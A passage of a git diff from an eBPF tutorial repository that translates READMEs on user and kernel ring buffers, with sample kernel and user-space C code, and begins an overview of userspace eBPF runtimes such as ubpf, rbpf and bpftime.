`bpf_ringbuf_reserve` function and writes relevant information. Finally, the record is submitted with the `bpf_ringbuf_submit` function so that it can be read by user mode. ```c // SPDX-License-Identifier: GPL-2.0 @@ -115,9 +115,9 @@ int kill_exit(struct trace_event_raw_sys_exit *ctx) } ``` -### 编写用户态程序 +### Writing User Mode Programs -在用户空间,我们通过 `ring_buffer_user__reserve` 函数在 ring buffer 中预留出一段空间,这段空间用于写入我们希望传递给内核的信息。然后,通过 `ring_buffer_user__submit` 函数提交数据,之后这些数据就可以在内核态被读取。 +In user mode, we reserved a section of space in the ring buffer with the `ring_buffer_user__reserve` function. This space is used to write the information we want to pass to the kernel. Then, the data is submitted using the `ring_buffer_user__submit` function, after which this data can be read and processed in kernel mode. ```c static int write_samples(struct user_ring_buffer *ringbuf) @@ -155,9 +155,9 @@ done: } ``` -### 初始化环形缓冲区并轮询 +### Initialization of the Ring Buffer and Poll -最后,对 ring buffer 进行初始化并定时轮询,这样我们就可以实时得知内核态的数据消费情况,我们还可以在用户空间对 `user_ringbuf` 进行写入操作,然后在内核态对其进行读取和处理。 +Finally, initialize the ring buffer and periodically poll, so we can know in real-time the consumption of data in kernel mode. We can also write to the `user_ringbuf` in user mode, then read and process it in kernel mode. ```c write_samples(user_ringbuf); @@ -182,19 +182,19 @@ done: } ``` -通过以上步骤,我们实现了用户态与内核态间环形缓冲区的双向数据传输。 +Through the above steps, we have implemented two-way data transmission between user mode and kernel mode. -## 二、编译和运行代码 +## II. Compile and Run the Code -为了编译和运行以上代码,我们可以通过以下命令来实现: +To compile and run the above code, we can run the following command: ```sh make ``` -关于如何安装依赖,请参考: +For information on how to install dependencies, refer to: -运行结果将展示如何使用 user ring buffer 和 kernel ringbuffer 在用户态和内核态间进行高效的数据传输: +The execution result displays how to use the user ring buffer and kernel ringbuffer for efficient data transmission between user mode and kernel mode: ```console $ sudo ./user_ringbuf @@ -210,14 +210,14 @@ Draining current samples... Draining current samples... ``` -## 总结 +## Conclusion -在本篇文章中,我们介绍了如何使用eBPF的user ring buffer和kernel ring buffer在用户态和内核态之间进行数据传输。通过这种方式,我们可以有效地将用户态的数据传送给内核,或者将内核生成的数据反馈给用户,从而实现了内核态和用户态的双向通信。 +In this article, we discussed how to use eBPF's user ring buffer and kernel ring buffer for data transmission between user mode and kernel mode. Through this method, we can effectively deliver user data to the kernel or feed back kernel-generated data to the user, thus implementing two-way communication between the kernel and user modes. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. -参考资料: +References: 1. [https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/) -> 原文地址: 转载请注明出处。 +> Original URL: Please indicate the source when reprinting. diff --git a/src/35-user-ringbuf/README.zh.md b/src/35-user-ringbuf/README.zh.md new file mode 100644 index 0000000..85affed --- /dev/null +++ b/src/35-user-ringbuf/README.zh.md @@ -0,0 +1,223 @@ +# eBPF开发实践:使用 user ring buffer 向内核异步发送信息 + +eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 + +eBPF的一个独特之处是它不仅可以在内核态运行程序,从而访问系统底层的状态和资源,同时也可以通过特殊的数据结构与用户态程序进行通信。关于这方面的一个重要概念就是内核态和用户态之间的环形队列——ring buffer。在许多实时或高性能要求的应用中,环形队列是一种常用的数据结构。由于它的FIFO(先进先出)特性,使得数据在生产者和消费者之间可以持续、线性地流动,从而避免了频繁的IO操作和不必要的内存 reallocation开销。 + +在eBPF中,分别提供了两种环形队列: user ring buffer 和 kernel ring buffer,以实现用户态和内核态之间的高效数据通信。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## 用户态和内核态环形队列—user ring buffer和kernel ring buffer + +围绕内核态和用户态这两个主要运行级别,eBPF提供了两种相应的环形队列数据结构:用户态环形队列——User ring buffer和内核态环形队列——Kernel ring buffer。 + +Kernel ring buffer 则由 eBPF实现,专为Linux内核设计,用于追踪和记录内核日志、性能统计信息等,它的能力是内核态和用户态数据传输的核心,可以从内核态向用户态传送数据。Kernel ring buffer 在 5.7 版本的内核中被引入,目前已经被广泛应用于内核日志系统、性能分析工具等。 + +对于内核态往用户态发送应用场景,如内核监控事件的发送、异步通知、状态更新通知等,ring buffer 数据结构都能够胜任。比如,当我们需要监听网络服务程序的大量端口状态时,这些端口的开启、关闭、错误等状态更新就需由内核实时传递到用户空间进行处理。而Linux 内核的日志系统、性能分析工具等,也需要频繁地将大量数据发送到用户空间,以支持用户人性化地展示和分析这些数据。在这些场景中,ring buffer在内核态往用户态发送数据中表现出了极高的效率。 + +User ring buffer 是基于环形缓冲器的一种新型 Map 类型,它提供了单用户空间生产者/单内核消费者的语义。这种环形队列的优点是对异步消息传递提供了优秀的支持,避免了不必要的同步操作,使得内核到用户空间的数据传输可以被优化,并且降低了系统调用的系统开销。User ring buffer 在 6.1 版本的内核中被引入,目前的使用场景相对较少。 + +bpftime 是一个用户空间 eBPF 运行时,允许现有 eBPF 应用程序在非特权用户空间使用相同的库和工具链运行。它为 eBPF 提供了 Uprobe 和 Syscall 跟踪点,与内核 Uprobe 相比,性能有了显著提高,而且无需手动检测代码或重启进程。运行时支持用户空间共享内存中的进程间 eBPF 映射,也兼容内核 eBPF 映射,允许与内核 eBPF 基础架构无缝运行。它包括一个适用于各种架构的高性能 LLVM JIT,以及一个适用于 x86 的轻量级 JIT 和一个解释器。GitHub 地址: + +在 bpftime 中,我们使用 user ring buffer 来实现用户态 eBPF 往内核态 eBPF 发送数据,并更新内核态 eBPF 对应的 maps,让内核态和用户态的 eBPF 一起协同工作。user ring buffer 的异步特性,可以避免系统调用不必要的同步操作,从而提高了内核态和用户态之间的数据传输效率。 + +eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但它们的设计初衷和应用场景有所不同: + +- **设计焦点**:io_uring主要专注于提高异步I/O操作的性能和效率,而eBPF的环形队列更多关注于内核和用户空间之间的数据通信和事件传输。 +- **应用范围**:io_uring主要用于文件I/O和网络I/O的场景,而eBPF的环形队列则更广泛,不限于I/O操作,还包括系统调用跟踪、网络数据包处理等。 +- **灵活性和扩展性**:eBPF提供了更高的灵活性和扩展性,允许用户定义复杂的数据处理逻辑,并在内核态执行。 + +下面,我们将通过一段代码示例,详细展示如何利用 user ring buffer,实现从用户态向内核传送数据,并以 kernel ring buffer 相应地从内核态向用户态传送数据。 + +## 一、实现:在用户态和内核态间使用 ring buffer 传送数据 + +借助新的 BPF MAP,我们可以实现在用户态和内核态间通过环形缓冲区传送数据。在这个示例中,我们将详细说明如何在用户空间创建一个 "用户环形缓冲区" (user ring buffer) 并向其写入数据,然后在内核空间中通过 `bpf_user_ringbuf_drain` 函数来消费这些数据。同时,我们也会使用 "内核环形缓冲区" (kernel ring buffer) 来从内核空间反馈数据到用户空间。为此,我们需要在用户空间和内核空间分别创建并操作这两个环形缓冲区。 + +完整的代码可以在 中找到。 + +### 创建环形缓冲区 + +在内核空间,我们创建了一个类型为 `BPF_MAP_TYPE_USER_RINGBUF` 的 `user_ringbuf`,以及一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 `kernel_ringbuf`。在用户空间,我们创建了一个 `struct ring_buffer_user` 结构体的实例,并通过 `ring_buffer_user__new` 函数和对应的操作来管理这个用户环形缓冲区。 + +```c + /* Set up ring buffer polling */ + rb = ring_buffer__new(bpf_map__fd(skel->maps.kernel_ringbuf), handle_event, NULL, NULL); + if (!rb) + { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); +``` + +### 编写内核态程序 + +我们定义一个 `kill_exit` 的 tracepoint 程序,每当有进程退出时,它会通过 `bpf_user_ringbuf_drain` 函数读取 `user_ringbuf` 中的用户数据,然后通过 `bpf_ringbuf_reserve` 函数在 `kernel_ringbuf` 中创建一个新的记录,并写入相关信息。最后,通过 `bpf_ringbuf_submit` 函数将这个记录提交,使得该记录能够被用户空间读取。 + +```c +// SPDX-License-Identifier: GPL-2.0 +/* Copyright (c) 2022 Meta Platforms, Inc. and affiliates. */ + +#include "vmlinux.h" +#include +#include +#include +#include "user_ringbuf.h" + +char _license[] SEC("license") = "GPL"; + +struct +{ + __uint(type, BPF_MAP_TYPE_USER_RINGBUF); + __uint(max_entries, 256 * 1024); +} user_ringbuf SEC(".maps"); + +struct +{ + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} kernel_ringbuf SEC(".maps"); + +int read = 0; + +static long +do_nothing_cb(struct bpf_dynptr *dynptr, void *context) +{ + struct event *e; + pid_t pid; + /* get PID and TID of exiting thread/process */ + pid = bpf_get_current_pid_tgid() >> 32; + + /* reserve sample from BPF ringbuf */ + e = bpf_ringbuf_reserve(&kernel_ringbuf, sizeof(*e), 0); + if (!e) + return 0; + + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + __sync_fetch_and_add(&read, 1); + return 0; +} + +SEC("tracepoint/syscalls/sys_exit_kill") +int kill_exit(struct trace_event_raw_sys_exit *ctx) +{ + long num_samples; + int err = 0; + + // receive data from userspace + num_samples = bpf_user_ringbuf_drain(&user_ringbuf, do_nothing_cb, NULL, 0); + + return 0; +} +``` + +### 编写用户态程序 + +在用户空间,我们通过 `ring_buffer_user__reserve` 函数在 ring buffer 中预留出一段空间,这段空间用于写入我们希望传递给内核的信息。然后,通过 `ring_buffer_user__submit` 函数提交数据,之后这些数据就可以在内核态被读取。 + +```c +static int write_samples(struct user_ring_buffer *ringbuf) +{ + int i, err = 0; + struct user_sample *entry; + + entry = user_ring_buffer__reserve(ringbuf, sizeof(*entry)); + if (!entry) + { + err = -errno; + goto done; + } + + entry->i = getpid(); + strcpy(entry->comm, "hello"); + + int read = snprintf(entry->comm, sizeof(entry->comm), "%u", i); + if (read <= 0) + { + /* Assert on the error path to avoid spamming logs with + * mostly success messages. + */ + err = read; + user_ring_buffer__discard(ringbuf, entry); + goto done; + } + + user_ring_buffer__submit(ringbuf, entry); + +done: + drain_current_samples(); + + return err; +} +``` + +### 初始化环形缓冲区并轮询 + +最后,对 ring buffer 进行初始化并定时轮询,这样我们就可以实时得知内核态的数据消费情况,我们还可以在用户空间对 `user_ringbuf` 进行写入操作,然后在内核态对其进行读取和处理。 + +```c + write_samples(user_ringbuf); + + /* Process events */ + printf("%-8s %-5s %-16s %-7s %-7s %s\n", + "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + while (!exiting) + { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } + } +``` + +通过以上步骤,我们实现了用户态与内核态间环形缓冲区的双向数据传输。 + +## 二、编译和运行代码 + +为了编译和运行以上代码,我们可以通过以下命令来实现: + +```sh +make +``` + +关于如何安装依赖,请参考: + +运行结果将展示如何使用 user ring buffer 和 kernel ringbuffer 在用户态和内核态间进行高效的数据传输: + +```console +$ sudo ./user_ringbuf +Draining current samples... +TIME EVENT COMM PID +16:31:37 SIGN node 1707 +Draining current samples... +16:31:38 SIGN node 1981 +Draining current samples... +16:31:38 SIGN node 1707 +Draining current samples... +16:31:38 SIGN node 1707 +Draining current samples... +``` + +## 总结 + +在本篇文章中,我们介绍了如何使用eBPF的user ring buffer和kernel ring buffer在用户态和内核态之间进行数据传输。通过这种方式,我们可以有效地将用户态的数据传送给内核,或者将内核生成的数据反馈给用户,从而实现了内核态和用户态的双向通信。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +参考资料: + +1. [https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/) + +> 原文地址: 转载请注明出处。 diff --git a/src/35-user-ringbuf/README_en.md b/src/35-user-ringbuf/README_en.md deleted file mode 100644 index 769f6b7..0000000 --- a/src/35-user-ringbuf/README_en.md +++ /dev/null @@ -1,223 +0,0 @@ -# eBPF Development Practices: Asynchronously Send to Kernel with User Ring Buffer - -eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro programs" in kernel mode, thereby changing system behavior or collecting fine-grained performance data without modifying kernel code. - -One unique aspect of eBPF is that it not only allows programs to run in kernel mode to access low-level system states and resources, but it can also communicate with user mode programs through special data structures. One important concept in this regard is the ring buffer between kernel mode and user mode. In many real-time or high-performance applications, the ring buffer is a commonly used data structure. Due to its FIFO (first in, first out) characteristics, data can flow continuously and linearly between the producer and the consumer, avoiding frequent IO operations and unnecessary memory reallocation overhead. - -In eBPF, two types of ring buffers are provided: user ring buffer and kernel ring buffer, to achieve efficient data communication between user mode and kernel mode. This article is part of the eBPF developer tutorial. More detailed content can be found here: The source code is open source in the . - -## User mode and kernel mode ring buffers—user ring buffer and kernel ring buffer - -Around the two main run levels of kernel mode and user mode, eBPF provides two corresponding ring buffer data structures: User ring buffer and Kernel ring buffer. - -Kernel ring buffer is implemented by eBPF and is specially designed for the Linux kernel to track and record kernel logs, performance statistics, etc. It is the core of data transfer from kernel mode to user mode and can send data from kernel mode to user mode. Kernel ring buffer was introduced in the 5.7 version of the kernel and is now widely used in the kernel logging system, performance analysis tools, etc. - -For scenarios where the kernel sends to user mode, such as sending kernel monitoring events, asynchronous notifications, status update notifications, etc., the ring buffer data structure can handle them. For example, when we need to monitor the status of a large number of ports of network service programs, the opening, closing, errors, and other status updates of these ports need to be real-time transferred to the user space for processing. Linux kernel's logging system, performance analysis tools, etc., also need to frequently send large amounts of data to user space to support user-friendly display and analysis of these data. In these scenarios, the ring buffer shows extremely high efficiency in sending data from the kernel to the user. - -User ring buffer is a new type of Map type based on the ring buffer, it provides the semantics of a single user space producer/single kernel consumer. The advantage of this ring buffer is that it provides excellent support for asynchronous message passing, avoiding unnecessary synchronization operations, optimizing data transfer from the kernel to user space, and reducing the system overhead of system calls. User ring buffer was introduced in the 6.1 version of the kernel and its current use cases are relatively limited. - -bpftime is a user space eBPF runtime that allows existing eBPF applications to run in unprivileged user space using the same libraries and toolchain. It provides Uprobe and Syscall tracing points for eBPF, which significantly improves performance compared to kernel Uprobe and does not require manual code detection or process restart. The runtime supports process eBPF mapping in user space shared memory, and is also compatible with kernel eBPF mapping, allowing seamless operation with the kernel eBPF infrastructure. It includes a high-performance LLVM JIT for various architectures, a lightweight JIT for x86, and an interpreter. GitHub address: - -In bpftime, we use the user ring buffer to implement data transmission from user mode eBPF to kernel mode eBPF, and update the maps corresponding to kernel mode eBPF, so that kernel mode and user mode eBPF can work together. The asynchronous characteristics of user ring buffer can avoid unnecessary synchronization operations of system calls, thereby improving the efficiency of data transmission between kernel mode and user mode. - -The bi-directional ring buffer of eBPF also has similarities to io_uring in some respects, but their design intentions and use cases are different: - -- **Design focus**: io_uring primarily focuses on improving the performance and efficiency of asynchronous I/O operations, while eBPF's ring buffer focuses more on data communication and event transmission between the kernel and user space. -- **Application range**: io_uring is mainly used in file I/O and network I/O scenarios, while eBPF's ring buffer is more widespread, not limited to I/O operations, but also including system call tracing, network packet processing, etc. -- **Flexibility and extensibility**: eBPF provides higher flexibility and extensibility, allowing users to define complex data processing logic and execute it in kernel mode. - -Following is a code example where we will show in detail how to use user ring buffer to transmit data from user mode to the kernel, and how to respond accordingly with kernel ring buffer to transmit data from kernel mode to user mode. - -## I. Implementation: Using Ring Buffer to Transfer Data Between User Mode and Kernel Mode - -With the help of the new BPF MAP, we can implement the transfer of data between user mode and kernel mode through the ring buffer. In this example, we will detail how to create a "user ring buffer" in user space and write data to it and then consume this data in kernel space with the `bpf_user_ringbuf_drain` function. At the same time, we will use the "kernel ring buffer" to feed back data from kernel space to user space. To do this, we need to create and operate these two ring buffers separately in user space and kernel space. - -The complete code can be found at . - -### Create Ring Buffer - -In kernel mode, we created a `user_ringbuf` of type `BPF_MAP_TYPE_USER_RINGBUF` and a `kernel_ringbuf` of type `BPF_MAP_TYPE_RINGBUF`. In user mode, we created an instance of the `struct ring_buffer_user` structure and managed this user ring buffer through the `ring_buffer_user__new` function and corresponding operations. - -```c - /* Set up ring buffer polling */ - rb = ring_buffer__new(bpf_map__fd(skel->maps.kernel_ringbuf), handle_event, NULL, NULL); - if (!rb) - { - err = -1; - fprintf(stderr, "Failed to create ring buffer\n"); - goto cleanup; - } - user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); -``` - -### Writing Kernel Mode Programs - -We define a `kill_exit` tracepoint program that will read user data from `user_ringbuf` with the `bpf_user_ringbuf_drain` function whenever a process exits. Then, it creates a new record in `kernel_ringbuf` with the `bpf_ringbuf_reserve` function and writes relevant information. Finally, the record is submitted with the `bpf_ringbuf_submit` function so that it can be read by user mode. - -```c -// SPDX-License-Identifier: GPL-2.0 -/* Copyright (c) 2022 Meta Platforms, Inc. and affiliates. */ - -#include "vmlinux.h" -#include -#include -#include -#include "user_ringbuf.h" - -char _license[] SEC("license") = "GPL"; - -struct -{ - __uint(type, BPF_MAP_TYPE_USER_RINGBUF); - __uint(max_entries, 256 * 1024); -} user_ringbuf SEC(".maps"); - -struct -{ - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} kernel_ringbuf SEC(".maps"); - -int read = 0; - -static long -do_nothing_cb(struct bpf_dynptr *dynptr, void *context) -{ - struct event *e; - pid_t pid; - /* get PID and TID of exiting thread/process */ - pid = bpf_get_current_pid_tgid() >> 32; - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&kernel_ringbuf, sizeof(*e), 0); - if (!e) - return 0; - - e->pid = pid; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - __sync_fetch_and_add(&read, 1); - return 0; -} - -SEC("tracepoint/syscalls/sys_exit_kill") -int kill_exit(struct trace_event_raw_sys_exit *ctx) -{ - long num_samples; - int err = 0; - - // receive data from userspace - num_samples = bpf_user_ringbuf_drain(&user_ringbuf, do_nothing_cb, NULL, 0); - - return 0; -} -``` - -### Writing User Mode Programs - -In user mode, we reserved a section of space in the ring buffer with the `ring_buffer_user__reserve` function. This space is used to write the information we want to pass to the kernel. Then, the data is submitted using the `ring_buffer_user__submit` function, after which this data can be read and processed in kernel mode. - -```c -static int write_samples(struct user_ring_buffer *ringbuf) -{ - int i, err = 0; - struct user_sample *entry; - - entry = user_ring_buffer__reserve(ringbuf, sizeof(*entry)); - if (!entry) - { - err = -errno; - goto done; - } - - entry->i = getpid(); - strcpy(entry->comm, "hello"); - - int read = snprintf(entry->comm, sizeof(entry->comm), "%u", i); - if (read <= 0) - { - /* Assert on the error path to avoid spamming logs with - * mostly success messages. - */ - err = read; - user_ring_buffer__discard(ringbuf, entry); - goto done; - } - - user_ring_buffer__submit(ringbuf, entry); - -done: - drain_current_samples(); - - return err; -} -``` - -### Initialization of the Ring Buffer and Poll - -Finally, initialize the ring buffer and periodically poll, so we can know in real-time the consumption of data in kernel mode. We can also write to the `user_ringbuf` in user mode, then read and process it in kernel mode. - -```c - write_samples(user_ringbuf); - - /* Process events */ - printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); - while (!exiting) - { - err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) - { - err = 0; - break; - } - if (err < 0) - { - printf("Error polling perf buffer: %d\n", err); - break; - } - } -``` - -Through the above steps, we have implemented two-way data transmission between user mode and kernel mode. - -## II. Compile and Run the Code - -To compile and run the above code, we can run the following command: - -```sh -make -``` - -For information on how to install dependencies, refer to: - -The execution result displays how to use the user ring buffer and kernel ringbuffer for efficient data transmission between user mode and kernel mode: - -```console -$ sudo ./user_ringbuf -Draining current samples... -TIME EVENT COMM PID -16:31:37 SIGN node 1707 -Draining current samples... -16:31:38 SIGN node 1981 -Draining current samples... -16:31:38 SIGN node 1707 -Draining current samples... -16:31:38 SIGN node 1707 -Draining current samples... -``` - -## Conclusion - -In this article, we discussed how to use eBPF's user ring buffer and kernel ring buffer for data transmission between user mode and kernel mode. Through this method, we can effectively deliver user data to the kernel or feed back kernel-generated data to the user, thus implementing two-way communication between the kernel and user modes. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. - -References: - -1. [https://lwn.net/Articles/907056/](https://lwn.net/Articles/907056/) - -> Original URL: Please indicate the source when reprinting. diff --git a/src/36-userspace-ebpf/README.md b/src/36-userspace-ebpf/README.md index be83019..1d5203a 100644 --- a/src/36-userspace-ebpf/README.md +++ b/src/36-userspace-ebpf/README.md @@ -1,151 +1,148 @@ -# 用户空间 eBPF 运行时:深度解析与应用实践 +# Userspace eBPF Runtimes: Overview and Applications -郑昱笙 +Yusheng Zheng -本文旨在对用户空间的 eBPF 运行时和对应的一些应用场景进行剖析和总结。尽管大多数人对基于内核的 eBPF 已有所了解,用户空间 eBPF 的进展和应用实践同样引人注目。本文还将探讨用户空间 eBPF 运行时与 Wasm 运行时的技术比较,后者在云原生和边缘计算领域已获得广泛的关注。我们也新开源了一个用户态 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。通过 LLVM `JIT/AOT` 后端支持,我们的基准测试表明 bpftime 是最快的用户空间 eBPF 运行时之一,同时还可以让内核中间的 eBPF Uprobe 无缝在用户空间运行,获得近十倍的性能提升。 +In this blog post, we'll dive into the world of eBPF in userspace. While many are familiar with kernel-based eBPF, userspace eBPF runtimes have been making significant strides and offer compelling use cases. We will also compare userspace eBPF runtimes with Wasm runtimes, another popular technology in the cloud-native and edge computing landscape. Among these, we're excited to introduce [bpftime](https://github.com/eunomia-bpf/bpftime). Powered by an LLVM `JIT/AOT` backend, our benchmarks suggest that bpftime stands out as one of the fastest userspace eBPF runtimes available. -## eBPF:内核的动态扩展运行时与字节码 +## Introduction to eBPF -### eBPF 究竟是何方神圣? +### What is eBPF? -eBPF,全称 "extended Berkeley Packet Filter",是一项允许在不更改内核源代码或重启系统的情况下动态干预和修改内核行为的革命性技术。虽然 eBPF 起初是作为网络数据包过滤工具而设计,但如今已广泛应用于从性能分析到安全策略等多个方面,逐渐成为系统管理员的得力助手。 +eBPF, which stands for "extended Berkeley Packet Filter," is a revolutionary technology that facilitates the dynamic tracing and monitoring of kernel operations without modifying kernel source code or rebooting the system. Originally designed for network packet filtering, eBPF has evolved to support a wide range of applications, from performance analysis to security, making it a versatile tool in a system administrator's arsenal. -eBPF 的前身,Berkeley Packet Filter (BPF) —— 20 世纪 90 年代初的产物,主要用于网络数据包的高效过滤。尽管 BPF 已被广大用户所认可,eBPF 的出现则为其带来了更为广泛的指令集,并能直接与内核数据结构互动。自 2014 年 Linux 内核引入 eBPF 以后,它的影响力迅速扩张。Linux 的核心开发团队不断地完善 eBPF,使其从一个基础的网络数据包过滤器逐渐演变为一个功能强大的字节码引擎。 +The story of eBPF begins with the Berkeley Packet Filter (BPF), introduced in the early 1990s as a way to filter and capture network packets efficiently. Over the years, BPF proved to be an invaluable asset, but there was room for improvement. eBPF emerged as an advanced iteration of BPF, equipped with a richer instruction set and the capability to interact with kernel data structures directly. -### eBPF 对现代计算和网络的深远影响 +The Linux kernel adopted eBPF around 2014, and since then, its popularity and adoption have skyrocketed. Key contributors to the Linux kernel worked diligently to evolve eBPF from a simple packet filter to a generic and powerful bytecode engine. -随着现代计算环境日益复杂,实时数据的采集和深入分析显得尤为重要。在这一背景下,eBPF 凭借其卓越的动态性,为开发者和管理员提供了实时干预系统行为的强大工具。eBPF 以其卓越的灵活性在现代网络解决方案中占据核心地位。它为流量控制、负载均衡及安全策略在内核级别提供了细致的控制手段,确保了系统的性能优化和安全稳定。同时,eBPF 在系统可观察性上也做出了显著贡献,为各种系统调用和硬件事件提供了详细的可编程追踪方案,促进了问题的迅速定位和解决。 +### Its significance in modern computing and network solutions -## 用户空间 eBPF 运行时:eBPF 的新生代 +In today's complex computing environments, the need for real-time data and insights is paramount. eBPF shines in this regard, allowing developers and administrators to introspect and modify system behaviors on the fly. -### 什么是用户空间 eBPF 运行时? +Given its dynamic nature, eBPF has become a cornerstone of modern networking solutions. It enables fine-grained traffic control, load balancing, and security enforcement at the kernel level, ensuring optimal performance and security. Furthermore, in the realm of observability, eBPF provides granular insights into system calls, hardware events, and more, facilitating proactive problem detection and resolution. -虽然 eBPF 最初是为内核设计的,但它在用户空间的巨大潜力,以及内核对于 `GPL LICENSE` 的限制,也催生了用户空间 eBPF 运行时的产生。这些运行时允许开发者在内核之外利用 eBPF 的能力,提供了一个在内核之外的运行平台,扩展其实用性和适用性,同时不受限于 GPL LICENSE。虽然 eBPF 的一个突出特点是其在内核空间内执行代码的能力,提供快速的可观察性和数据聚合,但在某些情境下,拥有一个用户空间的替代方案变得非常有价值。这些用户空间运行时扩展了 eBPF 多功能性的范围,超越了内核集成,并常常作为特定用例的实验场地、调试工具或框架。 +### eBPF: from kernel runtime to userspace runtime -### 特定运行时简介 +While the initial design of eBPF was deeply embedded within the kernel, the demand for similar functionality in userspace applications led to the evolution of userspace eBPF runtimes. These runtimes allow developers to leverage eBPF's capabilities outside the kernel, expanding its utility and applicability. Userspace eBPF runtimes make it feasible to apply eBPF's prowess to a broader set of applications, from custom network protocols to novel security solutions, further cementing eBPF's role as a transformative technology in the computing landscape. + +## Userspace eBPF Runtimes and Their Role + +### What is a userspace eBPF runtime? + +A userspace eBPF runtime provides a platform outside of the kernel to run eBPF programs. While one of eBPF's standout attributes is its capability to execute code within the kernel space, offering rapid observability and data aggregation, there are scenarios where having a userspace alternative becomes valuable. These userspace runtimes extend the reach of eBPF's versatility to areas beyond kernel integrations and often serve as experimental grounds, debugging tools, or frameworks for specific use cases. + +### Introduction to specific runtimes #### **ubpf** -[uBPF](https://github.com/iovisor/ubpf) 是将 eBPF 引入用户空间的早期尝试之一。主要作为一个概念证明,它作为 eBPF 解释器的用户空间解释与 x86_64 和 arm64 JIT 的结合。尽管其起源是一个早期原型,uBPF 吸引了注意并被用作高性能网络项目(如 DPDK 和 Oko)的基础。它的非 GPL 许可证(Apache)使其适用于各种项目,包括非开源项目。然而,最近,uBPF 正在迎头赶上内核发展,特别是微软为其 eBPF Windows 实现做出的贡献。但是,开发 ubpf 和 rbpf 程序可能需要一个特定的工具链,这对于一些用户可能是一个障碍。ubpf 只有一个有限的哈希 maps 实现,对大多数场景而言可能不够。另外,ubpf 本身只是一个虚拟机/解释器,在实际的使用中,依然需要编写胶水代码,和其他用户空间程序进行编译、链接后才能使用。 +[uBPF](https://github.com/iovisor/ubpf) was among the early attempts to bring eBPF to the userspace. Conceived primarily as a proof-of-concept, it served as a user-space interpretation of an eBPF interpreter combined with an x86_64 and arm64 JIT. Despite its origins as an early prototype, uBPF garnered attention and was utilized as a foundation for high-performance networking projects such as DPDK and Oko. Its non-GPL licensing (Apache) makes it favorable for a wide range of projects, inclusive of proprietary ones. However, as of recent, uBPF is catching up with kernel developments, particularly with contributions from Microsoft for its eBPF Windows implementation. However, develop ubpf and rbpf programs may require a specific toolchain, which may be a barrier for some users. ubpf only have a limited hashmap implementation, which may not be enough for some users. #### **rbpf** -[rbpf](https://github.com/qmonnet/rbpf) 和 uBPF 非常相似,但重点是使用了 Rust 进行开发,这是一种因其内存安全保证而著称的语言。创建 rbpf 是由于想要探索 eBPF 和 Rust 的交集。虽然没有广泛采纳,但 rbpf 的知名用户包括 Solana 团队,他们使用它为带有 eBPF 驱动的智能合约的区块链工具。rbpf 的一个优势在于其许可证 (MIT),允许在各种项目中广泛重用。rbpf 也缺乏 eBPF Maps 支持,并且仅为 x86_64 提供 JIT 支持。同样,rbpf 也需要编译和手动嵌入对应的应用程序中才可以使用。 +[rbpf](https://github.com/qmonnet/rbpf) is heavily influenced by uBPF but with an emphasis on Rust, a language renowned for its memory safety guarantees. The creation of rbpf was driven by a desire to explore the intersections of eBPF and Rust. While not as widespread in adoption, notable users of rbpf include the Solana team, employing it for blockchain tools with eBPF-driven smart contracts. One of rbpf's advantages lies in its licensing (MIT), allowing for broad reuse across various projects. rbpf also lacks eBPF map support, and only has JIT support for x86_64. #### **bpftime** -基于 LLVM JIT/AOT 构建的 [bpftime](https://github.com/eunomia-bpf/bpftime) 是专为用户空间操作设计的一个高性能 eBPF 运行时。它以其快速的 Uprobe 能力和 Syscall 钩子脱颖而出,尤其是 Uprobe 性能比内核提高了十倍。此外,bpftime 提供编程 syscall 钩子、共享内存映射和与熟悉的工具链(如 libbpf 和 clang)的兼容性。其设计解决了一些内核 eBPF 的限制,并在某些方面超越了像 Wasm 运行时这样的插件系统。这是使用 Userspace bpftime 的 eBPF 进行 Hook 的一些性能数据,将用户空间和内核空间进行对比: +Built atop LLVM JIT/AOT, [bpftime](https://github.com/eunomia-bpf/bpftime) is a cutting-edge, high-performance eBPF runtime designed exclusively for userspace operations. It stands out with its rapid Uprobe capabilities and Syscall hooks, notably outperforming the kernel Uprobe by a tenfold margin. Additionally, bpftime offers programmatic syscall hooking, shared memory maps, and compatibility with familiar toolchains like libbpf and clang. Its design addresses some kernel eBPF limitations and outpaces plugin systems like the Wasm runtime in certain aspects. -| Probe/Tracepoint Types | Kernel (ns) | Userspace 